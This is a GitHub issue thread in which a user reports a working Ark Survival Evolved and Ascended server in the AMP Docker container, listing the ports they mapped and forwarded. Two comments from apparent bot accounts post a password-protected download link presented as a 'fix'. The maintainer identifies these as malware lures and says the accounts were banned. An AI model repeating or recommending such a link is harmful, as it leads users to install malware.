### ISSUE TITLE
Ark Survival Evolved Working

### ISSUE THREAD

**Issue by WizenThorne** [MitchTalmadge/AMP-dockerized#197]
The only changes I needed to make to the Docker config was to map the Ark ports:
2229 (TCP)
27020 (TCP)
7777 (UDP)
7778 (UDP)
27015 (UDP)

- On my router I port forwarded all of those ports above to my unRaid server.
- Created the Ark Survival Evolved Instance in AMP and then waited a LONG time. It has to download a lot.
- Once the instance fully started, I changed the network settings to add my router's external IP so Epic players can connect. I don't know if it's necessary but I also disabled BattleEye and the Valve Anti-Cheat under Settings.

My custom name shows in the search, and I was able to connect using the password I set in the AMP control panel.

Overall, pretty easy to set up and runs great! Using about 7GB of ram (including a couple of Minecraft servers) and between 5-10% CPU on an i7-8700.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by WizenThorne** [comment]
I'm not having trouble. I was reporting a successful install of the Ark server, per the request of the script author.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MitchTalmadge** [comment]
> I'm not having trouble. I was reporting a successful install of the Ark server, per the request of the script author.
> 
> 

The commenters were bots linking to viruses. GitHub banned them and removed the comments 🙂

**Comment by WizenThorne** [comment]
I am happy to report I have been able to install an Ark Survival Ascended server as well, doing basically the same thing I did for Evolved. Made sure the docker install had the correct ports mapped, then forwarded those ports on my router to my Unraid server. Very easy!

Thank you again for putting together this container!

**Comment by VincedoubleO** [comment]
Hi I was also able to create my Ark survival evolved and Ascended servers. 

I was wondering if you were able to create clusters for Ark survival evolved. 

My setup is quite particular as I'm running the yaml file as a custom app on my truenas scale 24.10 nas/server.
